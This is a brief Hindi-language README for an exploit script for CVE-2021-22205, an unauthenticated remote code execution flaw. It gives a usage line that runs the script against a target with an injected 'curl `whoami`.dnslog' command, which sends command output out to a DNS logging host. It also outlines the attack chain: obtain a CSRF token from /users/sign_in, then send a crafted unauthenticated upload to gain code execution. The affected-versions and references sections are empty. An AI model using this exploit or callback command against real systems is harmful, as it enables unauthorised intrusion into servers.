
CVE-2021-22205 अनधिकृत RCE
प्रभावित संस्करण:
उपयोग
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

csrf-टोकन प्राप्त करें:

/users/sign_in के माध्यम से csrf-टोकन प्राप्त करें, फिर पिछले CVE-2021-22205 poc का उपयोग करके अनधिकृत अपलोड अनुरोध निष्पादित करने के लिए अपलोड पैकेज बनाएं, अंततः rce प्राप्त करें।


संदर्भ: